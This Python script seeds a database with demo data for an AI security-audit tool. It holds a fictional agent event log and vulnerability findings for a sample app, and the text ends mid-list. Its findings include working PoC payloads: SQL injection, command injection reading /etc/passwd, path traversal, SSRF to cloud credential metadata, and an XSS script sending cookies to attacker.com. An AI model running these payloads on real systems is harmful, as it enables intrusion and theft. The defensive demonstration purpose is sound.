WuYanBo
/
CodeReview
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
CodeReview/backend/scripts/create_agent_demo_data.py

1297 lines
50 KiB
Python
Raw Normal View History

feat: Update deployment configurations, dependency management, and documentation, including a new sandbox build service.
2025-12-15 15:18:55 +08:00
#!/usr/bin/env python3
"""
创建 Agent 审计任务演示数据
用于生成 HTML 报告示例展示
运行方式:
cd backend && python -m scripts.create_agent_demo_data
"""
import asyncio
import json
import uuid
import sys
import os
from datetime import datetime, timedelta, timezone
# 添加backend目录到路径
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession
from sqlalchemy.orm import sessionmaker
from sqlalchemy.future import select
from app.core.config import settings
from app.models.user import User
from app.models.project import Project
from app.models.agent_task import (
AgentTask, AgentEvent, AgentFinding, AgentTreeNode, AgentCheckpoint,
AgentTaskStatus, AgentTaskPhase, AgentEventType,
VulnerabilitySeverity, VulnerabilityType, FindingStatus
)
# 演示数据配置
DEMO_PROJECT_NAME = "VulnWebApp - 安全演示项目"
DEMO_TASK_NAME = "智能漏洞挖掘审计 - 完整示例"
async def get_or_create_demo_project(db: AsyncSession, user_id: str) -> Project:
"""获取或创建演示项目"""
result = await db.execute(
select(Project).where(Project.name == DEMO_PROJECT_NAME)
)
project = result.scalars().first()
if not project:
project = Project(
name=DEMO_PROJECT_NAME,
description="用于演示 Agent 智能审计功能的示例 Web 应用项目,包含多种常见安全漏洞",
source_type="zip",
owner_id=user_id,
is_active=True,
default_branch="main",
programming_languages=json.dumps(["Python", "JavaScript", "SQL"]),
created_at=datetime.now(timezone.utc) - timedelta(days=7),
)
db.add(project)
await db.flush()
print(f"✓ 创建演示项目: {project.name}")
else:
print(f"演示项目已存在: {project.name}")
return project
async def create_agent_demo_task(db: AsyncSession, project: Project, user_id: str) -> AgentTask:
"""创建 Agent 审计任务演示数据"""
# 检查是否已存在
result = await db.execute(
select(AgentTask).where(AgentTask.name == DEMO_TASK_NAME)
)
existing = result.scalars().first()
if existing:
print(f"删除已存在的演示任务: {existing.id}")
await db.delete(existing)
await db.flush()
now = datetime.now(timezone.utc)
task_start = now - timedelta(minutes=15)
task_end = now - timedelta(minutes=2)
# 创建 Agent 任务
task = AgentTask(
id=str(uuid.uuid4()),
project_id=project.id,
created_by=user_id,
name=DEMO_TASK_NAME,
description="对 VulnWebApp 进行全面的安全漏洞扫描,包括 SQL 注入、XSS、命令注入等常见漏洞类型的检测与验证",
task_type="agent_audit",
# 配置
audit_scope={"include": ["**/*.py", "**/*.js", "**/*.html"], "exclude": ["tests/*", "node_modules/*"]},
target_vulnerabilities=["sql_injection", "xss", "command_injection", "path_traversal", "ssrf", "hardcoded_secret"],
verification_level="sandbox",
branch_name="main",
exclude_patterns=["*.test.py", "*.spec.js", "__pycache__/*"],
# LLM 配置
llm_config={"provider": "openai", "model": "gpt-4", "temperature": 0.1},
agent_config={"max_depth": 3, "enable_verification": True, "enable_poc_generation": True},
max_iterations=50,
token_budget=100000,
timeout_seconds=1800,
# 状态
status=AgentTaskStatus.COMPLETED,
current_phase=AgentTaskPhase.REPORTING,
current_step="报告生成完成",
# 进度统计
total_files=48,
indexed_files=48,
analyzed_files=48,
total_chunks=156,
# Agent 统计
total_iterations=32,
tool_calls_count=87,
tokens_used=45680,
# 发现统计
findings_count=8,
verified_count=6,
false_positive_count=1,
# 严重程度统计
critical_count=2,
high_count=3,
medium_count=2,
low_count=1,
# 评分
quality_score=72.5,
security_score=35.8,
# 审计计划
audit_plan={
"phases": [
{"name": "代码索引", "description": "建立代码向量索引,支持语义检索"},
{"name": "入口点识别", "description": "识别用户输入入口点和敏感API"},
{"name": "漏洞模式匹配", "description": "基于已知漏洞模式进行检测"},
{"name": "数据流分析", "description": "追踪污点数据流,验证漏洞可达性"},
{"name": "沙箱验证", "description": "在隔离环境中验证漏洞可利用性"},
{"name": "PoC 生成", "description": "为已验证漏洞生成概念验证代码"},
],
"focus_areas": ["用户认证模块", "数据库查询接口", "文件上传功能", "API 端点"],
},
# 时间戳
created_at=task_start - timedelta(minutes=1),
started_at=task_start,
completed_at=task_end,
)
db.add(task)
await db.flush()
print(f"✓ 创建 Agent 任务: {task.id}")
return task
async def create_agent_events(db: AsyncSession, task: AgentTask) -> list:
"""创建 Agent 事件流"""
events = []
base_time = task.started_at
sequence = 0
def add_event(event_type: str, message: str, phase: str = None,
tool_name: str = None, tool_input: dict = None,
tool_output: dict = None, tool_duration_ms: int = None,
finding_id: str = None, tokens_used: int = 0,
metadata: dict = None, time_offset_seconds: int = 0):
nonlocal sequence
sequence += 1
event = AgentEvent(
id=str(uuid.uuid4()),
task_id=task.id,
event_type=event_type,
phase=phase,
message=message,
tool_name=tool_name,
tool_input=tool_input,
tool_output=tool_output,
tool_duration_ms=tool_duration_ms,
finding_id=finding_id,
tokens_used=tokens_used,
event_metadata=metadata,
sequence=sequence,
created_at=base_time + timedelta(seconds=time_offset_seconds),
)
events.append(event)
return event
# ========== 任务启动 ==========
add_event(
AgentEventType.TASK_START,
"Agent 审计任务启动,开始智能漏洞挖掘",
metadata={"target_vulnerabilities": task.target_vulnerabilities},
time_offset_seconds=0
)
# ========== 规划阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入规划阶段 - 分析项目结构,制定审计策略",
phase=AgentTaskPhase.PLANNING,
time_offset_seconds=5
)
add_event(
AgentEventType.THINKING,
"分析项目结构:检测到 Flask Web 应用框架,包含用户认证、数据库操作、文件处理等模块。重点关注 SQL 注入、XSS、命令注入等高危漏洞。",
phase=AgentTaskPhase.PLANNING,
tokens_used=450,
time_offset_seconds=10
)
add_event(
AgentEventType.PLANNING,
"制定审计计划1) 索引代码库 2) 识别入口点 3) 模式匹配检测 4) 数据流分析 5) 沙箱验证 6) 生成报告",
phase=AgentTaskPhase.PLANNING,
tokens_used=380,
time_offset_seconds=15
)
add_event(
AgentEventType.PHASE_COMPLETE,
"规划阶段完成,识别出 12 个高优先级检查点",
phase=AgentTaskPhase.PLANNING,
time_offset_seconds=20
)
# ========== 索引阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入索引阶段 - 构建代码向量索引",
phase=AgentTaskPhase.INDEXING,
time_offset_seconds=25
)
add_event(
AgentEventType.TOOL_CALL,
"调用 RAG 索引工具,处理源代码文件",
phase=AgentTaskPhase.INDEXING,
tool_name="rag_index",
tool_input={"paths": ["app/", "routes/", "models/", "utils/"], "chunk_size": 1500},
time_offset_seconds=30
)
add_event(
AgentEventType.RAG_RESULT,
"代码索引完成48 个文件156 个代码块,向量维度 1536",
phase=AgentTaskPhase.INDEXING,
tool_name="rag_index",
tool_output={"files_indexed": 48, "chunks_created": 156, "vector_dim": 1536},
tool_duration_ms=8500,
time_offset_seconds=45
)
add_event(
AgentEventType.PHASE_COMPLETE,
"索引阶段完成",
phase=AgentTaskPhase.INDEXING,
time_offset_seconds=50
)
# ========== 分析阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入分析阶段 - 执行漏洞检测",
phase=AgentTaskPhase.ANALYSIS,
time_offset_seconds=55
)
# SQL 注入检测
add_event(
AgentEventType.THINKING,
"开始检测 SQL 注入漏洞:搜索数据库查询相关代码,识别用户输入拼接到 SQL 语句的模式",
phase=AgentTaskPhase.ANALYSIS,
tokens_used=320,
time_offset_seconds=60
)
add_event(
AgentEventType.RAG_QUERY,
"语义检索:查找 SQL 查询和用户输入处理代码",
phase=AgentTaskPhase.ANALYSIS,
tool_name="rag_search",
tool_input={"query": "SQL query user input parameter database execute", "top_k": 10},
time_offset_seconds=65
)
add_event(
AgentEventType.TOOL_CALL,
"读取文件: app/routes/user.py",
phase=AgentTaskPhase.ANALYSIS,
tool_name="read_file",
tool_input={"path": "app/routes/user.py", "start_line": 45, "end_line": 80},
time_offset_seconds=70
)
add_event(
AgentEventType.FINDING_NEW,
"发现 SQL 注入漏洞 [Critical]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "sql_injection", "severity": "critical", "file": "app/routes/user.py", "line": 52},
time_offset_seconds=80
)
# XSS 检测
add_event(
AgentEventType.THINKING,
"开始检测 XSS 漏洞:搜索 HTML 渲染和用户输入输出相关代码",
phase=AgentTaskPhase.ANALYSIS,
tokens_used=280,
time_offset_seconds=120
)
add_event(
AgentEventType.TOOL_CALL,
"读取文件: app/templates/comment.html",
phase=AgentTaskPhase.ANALYSIS,
tool_name="read_file",
tool_input={"path": "app/templates/comment.html"},
time_offset_seconds=130
)
add_event(
AgentEventType.FINDING_NEW,
"发现存储型 XSS 漏洞 [High]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "xss", "severity": "high", "file": "app/templates/comment.html", "line": 28},
time_offset_seconds=145
)
# 命令注入检测
add_event(
AgentEventType.RAG_QUERY,
"语义检索:查找系统命令执行相关代码",
phase=AgentTaskPhase.ANALYSIS,
tool_name="rag_search",
tool_input={"query": "os.system subprocess shell command execute", "top_k": 10},
time_offset_seconds=180
)
add_event(
AgentEventType.FINDING_NEW,
"发现命令注入漏洞 [Critical]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "command_injection", "severity": "critical", "file": "app/utils/backup.py", "line": 34},
time_offset_seconds=210
)
# 路径遍历检测
add_event(
AgentEventType.TOOL_CALL,
"分析文件操作代码",
phase=AgentTaskPhase.ANALYSIS,
tool_name="analyze_code",
tool_input={"pattern": "file path user input", "scope": "app/routes/"},
time_offset_seconds=250
)
add_event(
AgentEventType.FINDING_NEW,
"发现路径遍历漏洞 [High]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "path_traversal", "severity": "high", "file": "app/routes/download.py", "line": 18},
time_offset_seconds=280
)
# SSRF 检测
add_event(
AgentEventType.FINDING_NEW,
"发现 SSRF 漏洞 [High]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "ssrf", "severity": "high", "file": "app/routes/proxy.py", "line": 42},
time_offset_seconds=320
)
# 硬编码密钥检测
add_event(
AgentEventType.TOOL_CALL,
"扫描硬编码密钥和敏感信息",
phase=AgentTaskPhase.ANALYSIS,
tool_name="secret_scan",
tool_input={"patterns": ["api_key", "password", "secret", "token"]},
time_offset_seconds=360
)
add_event(
AgentEventType.FINDING_NEW,
"发现硬编码 API 密钥 [Medium]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "hardcoded_secret", "severity": "medium", "file": "app/config.py", "line": 15},
time_offset_seconds=380
)
add_event(
AgentEventType.FINDING_NEW,
"发现弱加密配置 [Medium]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "weak_crypto", "severity": "medium", "file": "app/utils/crypto.py", "line": 8},
time_offset_seconds=400
)
add_event(
AgentEventType.FINDING_NEW,
"发现调试模式未关闭 [Low]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "security_misconfiguration", "severity": "low", "file": "app/__init__.py", "line": 25},
time_offset_seconds=420
)
add_event(
AgentEventType.PHASE_COMPLETE,
"分析阶段完成,发现 8 个潜在漏洞",
phase=AgentTaskPhase.ANALYSIS,
time_offset_seconds=450
)
# ========== 验证阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入验证阶段 - 在沙箱环境中验证漏洞",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=460
)
# SQL 注入验证
add_event(
AgentEventType.SANDBOX_START,
"启动沙箱环境验证 SQL 注入漏洞",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
time_offset_seconds=470
)
add_event(
AgentEventType.SANDBOX_EXEC,
"执行 SQL 注入 PoC' OR '1'='1' --",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "' OR '1'='1' --", "target": "/api/user/search?name="},
time_offset_seconds=480
)
add_event(
AgentEventType.SANDBOX_RESULT,
"SQL 注入验证成功 - 成功绕过认证获取所有用户数据",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_output={"success": True, "response_code": 200, "data_leaked": True},
tool_duration_ms=1200,
time_offset_seconds=490
)
add_event(
AgentEventType.FINDING_VERIFIED,
"SQL 注入漏洞已验证 [Critical]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=495
)
# 命令注入验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行命令注入 PoC; id; whoami",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "; id; whoami", "target": "/api/backup?filename="},
time_offset_seconds=520
)
add_event(
AgentEventType.SANDBOX_RESULT,
"命令注入验证成功 - 成功执行任意系统命令",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_output={"success": True, "output": "uid=1000(www-data) gid=1000(www-data)"},
tool_duration_ms=800,
time_offset_seconds=535
)
add_event(
AgentEventType.FINDING_VERIFIED,
"命令注入漏洞已验证 [Critical]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=540
)
# XSS 验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行 XSS PoC<script>alert('XSS')</script>",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "<script>alert('XSS')</script>", "target": "/api/comment"},
time_offset_seconds=560
)
add_event(
AgentEventType.FINDING_VERIFIED,
"存储型 XSS 漏洞已验证 [High]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=580
)
# 路径遍历验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行路径遍历 PoC../../../etc/passwd",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "../../../etc/passwd", "target": "/api/download?file="},
time_offset_seconds=600
)
add_event(
AgentEventType.FINDING_VERIFIED,
"路径遍历漏洞已验证 [High]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=620
)
# SSRF 验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行 SSRF PoChttp://169.254.169.254/latest/meta-data/",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "http://169.254.169.254/latest/meta-data/", "target": "/api/proxy?url="},
time_offset_seconds=640
)
add_event(
AgentEventType.FINDING_VERIFIED,
"SSRF 漏洞已验证 [High]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=660
)
# 误报排除
add_event(
AgentEventType.THINKING,
"验证硬编码密钥:检查是否为测试/示例配置",
phase=AgentTaskPhase.VERIFICATION,
tokens_used=180,
time_offset_seconds=680
)
add_event(
AgentEventType.FINDING_FALSE_POSITIVE,
"硬编码密钥为误报 - 该文件为示例配置模板",
phase=AgentTaskPhase.VERIFICATION,
metadata={"reason": "File is example configuration template, not production code"},
time_offset_seconds=700
)
add_event(
AgentEventType.PHASE_COMPLETE,
"验证阶段完成6 个漏洞已验证1 个误报已排除",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=720
)
# ========== 报告阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入报告阶段 - 生成安全审计报告",
phase=AgentTaskPhase.REPORTING,
time_offset_seconds=730
)
add_event(
AgentEventType.TOOL_CALL,
"生成漏洞详情和修复建议",
phase=AgentTaskPhase.REPORTING,
tool_name="generate_report",
tool_input={"format": "html", "include_poc": True, "include_fix": True},
time_offset_seconds=740
)
add_event(
AgentEventType.INFO,
"报告生成完成:包含 8 个发现、6 个已验证漏洞、详细修复建议和 PoC 代码",
phase=AgentTaskPhase.REPORTING,
time_offset_seconds=760
)
add_event(
AgentEventType.PHASE_COMPLETE,
"报告阶段完成",
phase=AgentTaskPhase.REPORTING,
time_offset_seconds=770
)
# ========== 任务完成 ==========
add_event(
AgentEventType.TASK_COMPLETE,
"Agent 审计任务完成!发现 8 个安全问题,其中 2 个严重、3 个高危、2 个中危、1 个低危",
metadata={
"total_findings": 8,
"verified": 6,
"false_positives": 1,
"severity_distribution": {"critical": 2, "high": 3, "medium": 2, "low": 1},
"duration_seconds": 780,
"tokens_used": 45680,
},
time_offset_seconds=780
)
# 批量保存事件
for event in events:
db.add(event)
await db.flush()
print(f"✓ 创建了 {len(events)} 个 Agent 事件")
return events
async def create_agent_findings(db: AsyncSession, task: AgentTask) -> list:
"""创建 Agent 发现的漏洞"""
findings_data = [
{
"vulnerability_type": VulnerabilityType.SQL_INJECTION,
"severity": VulnerabilitySeverity.CRITICAL,
"title": "用户搜索接口存在 SQL 注入漏洞",
"description": "在 /api/user/search 接口中,用户输入的 name 参数直接拼接到 SQL 查询语句中,未经过任何过滤或参数化处理,攻击者可以通过构造恶意输入执行任意 SQL 语句。",
"file_path": "app/routes/user.py",
"line_start": 52,
"line_end": 58,
"function_name": "search_user",
"code_snippet": '''@app.route('/api/user/search')
def search_user():
name = request.args.get('name', '')
# 危险直接拼接用户输入到SQL语句
query = f"SELECT * FROM users WHERE name LIKE '%{name}%'"
result = db.execute(query)
return jsonify(result.fetchall())''',
"source": "request.args.get('name')",
"sink": "db.execute(query)",
"dataflow_path": [
{"step": 1, "location": "line 54", "description": "用户输入从 request.args.get() 获取"},
{"step": 2, "location": "line 56", "description": "用户输入直接拼接到 SQL 字符串"},
{"step": 3, "location": "line 57", "description": "拼接后的 SQL 被执行"},
],
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功执行 SQL 注入攻击",
"verification_result": {"success": True, "payload": "' OR '1'='1' --", "impact": "绕过认证,获取所有用户数据"},
"has_poc": True,
"poc_code": '''import requests
# SQL 注入 PoC
target_url = "http://target.com/api/user/search"
# Payload: 绕过认证获取所有用户
payload = "' OR '1'='1' --"
response = requests.get(target_url, params={"name": payload})
print(f"Status: {response.status_code}")
print(f"Data: {response.json()}")
# 预期结果:返回所有用户数据,而非仅匹配搜索条件的用户''',
"poc_description": "通过在 name 参数中注入 SQL 语句,绕过查询条件获取数据库中所有用户信息",
"poc_steps": [
"访问目标 URL: /api/user/search?name=' OR '1'='1' --",
"观察响应:应返回所有用户数据",
"进一步利用:可尝试 UNION 注入获取其他表数据",
],
"suggestion": "使用参数化查询或 ORM 框架来防止 SQL 注入",
"fix_code": '''@app.route('/api/user/search')
def search_user():
name = request.args.get('name', '')
# 修复:使用参数化查询
query = "SELECT * FROM users WHERE name LIKE :name"
result = db.execute(query, {"name": f"%{name}%"})
return jsonify(result.fetchall())''',
"fix_description": "使用 SQLAlchemy 的参数化查询功能,将用户输入作为参数传递,而非直接拼接到 SQL 语句中",
"references": [
{"type": "CWE", "id": "CWE-89", "url": "https://cwe.mitre.org/data/definitions/89.html"},
{"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
],
"ai_explanation": "这是一个典型的 SQL 注入漏洞。代码直接将用户输入拼接到 SQL 查询字符串中,没有进行任何转义或参数化处理。攻击者可以通过特殊字符(如单引号)闭合原有的 SQL 语句,然后注入自己的 SQL 代码。",
"ai_confidence": 0.98,
"xai_what": "SQL 注入是一种代码注入技术,攻击者通过在输入字段中插入恶意 SQL 代码来操纵数据库查询。",
"xai_why": "该漏洞存在是因为开发者直接将用户输入拼接到 SQL 语句中,没有使用参数化查询或进行输入验证。",
"xai_how": "攻击者可以在 name 参数中输入 ' OR '1'='1' -- 来绕过查询条件,或使用 UNION SELECT 来获取其他表的数据。",
"xai_impact": "攻击者可以1) 绕过认证 2) 读取敏感数据 3) 修改或删除数据 4) 在某些情况下执行系统命令。",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"tags": ["owasp-top10", "injection", "database", "authentication-bypass"],
},
{
"vulnerability_type": VulnerabilityType.COMMAND_INJECTION,
"severity": VulnerabilitySeverity.CRITICAL,
"title": "备份功能存在命令注入漏洞",
"description": "在备份功能中,用户提供的文件名参数直接传递给 os.system() 函数执行,攻击者可以通过命令分隔符(如 ; 或 |)注入任意系统命令。",
"file_path": "app/utils/backup.py",
"line_start": 34,
"line_end": 40,
"function_name": "create_backup",
"code_snippet": '''def create_backup(filename):
"""创建备份文件"""
# 危险:直接将用户输入传递给系统命令
backup_path = f"/backups/{filename}.tar.gz"
cmd = f"tar -czf {backup_path} /data/"
os.system(cmd) # 命令注入风险
return backup_path''',
"source": "filename 参数",
"sink": "os.system(cmd)",
"dataflow_path": [
{"step": 1, "location": "line 34", "description": "filename 参数从外部传入"},
{"step": 2, "location": "line 36", "description": "filename 拼接到 shell 命令"},
{"step": 3, "location": "line 37", "description": "命令通过 os.system() 执行"},
],
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功执行任意命令",
"verification_result": {"success": True, "payload": "; id; whoami", "output": "uid=1000(www-data)"},
"has_poc": True,
"poc_code": '''import requests
# 命令注入 PoC
target_url = "http://target.com/api/backup"
# Payload: 注入系统命令
payload = "test; id; cat /etc/passwd"
response = requests.post(target_url, json={"filename": payload})
print(f"Response: {response.text}")
# 预期结果:服务器执行 id 和 cat /etc/passwd 命令''',
"poc_description": "通过在 filename 参数中注入分号和系统命令,在服务器上执行任意代码",
"poc_steps": [
"构造恶意 filename: test; id; cat /etc/passwd",
"发送请求到 /api/backup 接口",
"观察服务器响应或日志中的命令执行结果",
],
"suggestion": "避免使用 os.system(),改用 subprocess 模块并禁用 shell=True对用户输入进行严格的白名单验证",
"fix_code": '''import subprocess
import re
def create_backup(filename):
"""创建备份文件 - 安全版本"""
# 修复:验证文件名只包含安全字符
if not re.match(r'^[a-zA-Z0-9_-]+$', filename):
raise ValueError("Invalid filename")
backup_path = f"/backups/{filename}.tar.gz"
# 修复:使用 subprocess 并传递参数列表
subprocess.run(
["tar", "-czf", backup_path, "/data/"],
check=True,
shell=False # 禁用shell
)
return backup_path''',
"fix_description": "1) 使用正则表达式验证文件名只包含安全字符 2) 使用 subprocess.run() 替代 os.system() 3) 禁用 shell 模式,将参数作为列表传递",
"references": [
{"type": "CWE", "id": "CWE-78", "url": "https://cwe.mitre.org/data/definitions/78.html"},
{"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
],
"ai_explanation": "这是一个严重的命令注入漏洞。os.system() 函数会通过 shell 执行命令,当用户输入被直接拼接到命令字符串中时,攻击者可以使用 shell 的特殊字符(如 ;、|、&&)来注入额外的命令。",
"ai_confidence": 0.99,
"xai_what": "命令注入允许攻击者在目标系统上执行任意操作系统命令。",
"xai_why": "该漏洞存在是因为用户输入直接拼接到 shell 命令中,没有进行任何过滤或转义。",
"xai_how": "攻击者可以在 filename 参数中输入 ; rm -rf / 来删除服务器文件,或执行反弹 shell 获取服务器控制权。",
"xai_impact": "完全的服务器控制权,包括:读取敏感文件、安装后门、横向移动、数据窃取、服务中断等。",
"cvss_score": 10.0,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"tags": ["owasp-top10", "injection", "rce", "critical"],
},
{
"vulnerability_type": VulnerabilityType.XSS,
"severity": VulnerabilitySeverity.HIGH,
"title": "评论功能存在存储型 XSS 漏洞",
"description": "用户提交的评论内容在展示时未经 HTML 转义直接渲染,攻击者可以在评论中注入恶意 JavaScript 代码,当其他用户查看评论时会执行这些代码。",
"file_path": "app/templates/comment.html",
"line_start": 28,
"line_end": 32,
"function_name": None,
"code_snippet": '''<div class="comment-list">
{% for comment in comments %}
<div class="comment-item">
<p class="comment-content">{{ comment.content | safe }}</p>
<!-- 危险使用 safe 过滤器禁用了自动转义 -->
</div>
{% endfor %}
</div>''',
"source": "comment.content (用户提交的评论)",
"sink": "{{ comment.content | safe }}",
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - XSS payload 成功执行",
"verification_result": {"success": True, "payload": "<script>alert('XSS')</script>"},
"has_poc": True,
"poc_code": """import requests
# 存储型 XSS PoC
target_url = "http://target.com/api/comment"
# Payload: 窃取用户 Cookie
payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
response = requests.post(target_url, json={"content": payload})
print(f"Comment posted: {response.status_code}")
# 当其他用户访问评论页面时,恶意脚本会自动执行""",
"poc_description": "通过在评论中注入 JavaScript 代码,当其他用户查看页面时窃取其 Cookie",
"suggestion": "移除 safe 过滤器,让 Jinja2 自动转义 HTML 特殊字符",
"fix_code": '''<div class="comment-list">
{% for comment in comments %}
<div class="comment-item">
<!-- 修复移除 safe 过滤器使用自动转义 -->
<p class="comment-content">{{ comment.content }}</p>
</div>
{% endfor %}
</div>''',
"fix_description": "移除 | safe 过滤器,让 Jinja2 模板引擎自动对用户内容进行 HTML 转义",
"references": [
{"type": "CWE", "id": "CWE-79", "url": "https://cwe.mitre.org/data/definitions/79.html"},
{"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
],
"ai_confidence": 0.96,
"xai_what": "存储型 XSS 是指恶意脚本被永久存储在目标服务器上,当用户访问包含该脚本的页面时会自动执行。",
"xai_why": "该漏洞存在是因为模板使用了 safe 过滤器,禁用了 Jinja2 的自动 HTML 转义功能。",
"xai_how": "攻击者提交包含 <script> 标签的评论,当其他用户浏览评论时,恶意脚本会在其浏览器中执行。",
"xai_impact": "会话劫持、钓鱼攻击、恶意重定向、键盘记录、加密货币挖矿等。",
"cvss_score": 8.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"tags": ["owasp-top10", "xss", "stored-xss", "frontend"],
},
{
"vulnerability_type": VulnerabilityType.PATH_TRAVERSAL,
"severity": VulnerabilitySeverity.HIGH,
"title": "文件下载接口存在路径遍历漏洞",
"description": "文件下载接口直接使用用户提供的文件名参数构建文件路径,没有验证路径是否在允许的目录范围内,攻击者可以使用 ../ 序列访问任意文件。",
"file_path": "app/routes/download.py",
"line_start": 18,
"line_end": 26,
"function_name": "download_file",
"code_snippet": '''@app.route('/api/download')
def download_file():
filename = request.args.get('file')
# 危险:直接拼接用户输入构建路径
file_path = os.path.join('/uploads/', filename)
if os.path.exists(file_path):
return send_file(file_path)
return "File not found", 404''',
"source": "request.args.get('file')",
"sink": "send_file(file_path)",
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功读取 /etc/passwd",
"verification_result": {"success": True, "payload": "../../../etc/passwd", "file_read": True},
"has_poc": True,
"poc_code": '''import requests
# 路径遍历 PoC
target_url = "http://target.com/api/download"
# Payload: 读取系统敏感文件
payload = "../../../etc/passwd"
response = requests.get(target_url, params={"file": payload})
print(f"File content:\\n{response.text}")''',
"suggestion": "使用 os.path.realpath() 解析路径后验证是否在允许的目录内",
"fix_code": '''import os
from pathlib import Path
UPLOAD_DIR = Path('/uploads/').resolve()
@app.route('/api/download')
def download_file():
filename = request.args.get('file')
# 修复:解析真实路径并验证
file_path = (UPLOAD_DIR / filename).resolve()
# 确保文件在允许的目录内
if not str(file_path).startswith(str(UPLOAD_DIR)):
return "Access denied", 403
if file_path.exists():
return send_file(file_path)
return "File not found", 404''',
"references": [
{"type": "CWE", "id": "CWE-22", "url": "https://cwe.mitre.org/data/definitions/22.html"},
],
"ai_confidence": 0.95,
"cvss_score": 7.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"tags": ["path-traversal", "file-read", "lfi"],
},
{
"vulnerability_type": VulnerabilityType.SSRF,
"severity": VulnerabilitySeverity.HIGH,
"title": "代理接口存在 SSRF 漏洞",
"description": "代理接口接受用户提供的 URL 并发起请求,没有验证目标地址,攻击者可以利用此漏洞访问内网资源或云元数据服务。",
"file_path": "app/routes/proxy.py",
"line_start": 42,
"line_end": 50,
"function_name": "proxy_request",
"code_snippet": '''@app.route('/api/proxy')
def proxy_request():
target_url = request.args.get('url')
# 危险:直接请求用户提供的 URL
response = requests.get(target_url)
return response.content''',
"source": "request.args.get('url')",
"sink": "requests.get(target_url)",
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功访问内网元数据服务",
"verification_result": {"success": True, "payload": "http://169.254.169.254/latest/meta-data/"},
"has_poc": True,
"poc_code": '''import requests
# SSRF PoC - 访问 AWS 元数据
target_url = "http://target.com/api/proxy"
payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
response = requests.get(target_url, params={"url": payload})
print(f"AWS Credentials:\\n{response.text}")''',
"suggestion": "实现 URL 白名单验证,禁止访问内网地址和元数据服务",
"fix_code": '''from urllib.parse import urlparse
import ipaddress
ALLOWED_HOSTS = ['api.example.com', 'cdn.example.com']
def is_safe_url(url):
parsed = urlparse(url)
# 检查协议
if parsed.scheme not in ['http', 'https']:
return False
# 检查是否在白名单
if parsed.hostname not in ALLOWED_HOSTS:
return False
# 检查是否为内网地址
try:
ip = ipaddress.ip_address(parsed.hostname)
if ip.is_private or ip.is_loopback:
return False
except ValueError:
pass
return True
@app.route('/api/proxy')
def proxy_request():
target_url = request.args.get('url')
if not is_safe_url(target_url):
return "Invalid URL", 400
response = requests.get(target_url, timeout=5)
return response.content''',
"references": [
{"type": "CWE", "id": "CWE-918", "url": "https://cwe.mitre.org/data/definitions/918.html"},
{"type": "OWASP", "id": "A10:2021", "url": "https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/"},
],
"ai_confidence": 0.94,
"cvss_score": 8.6,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"tags": ["owasp-top10", "ssrf", "cloud-metadata"],
},
{
"vulnerability_type": VulnerabilityType.HARDCODED_SECRET,
"severity": VulnerabilitySeverity.MEDIUM,
"title": "发现硬编码的 API 密钥(误报)",
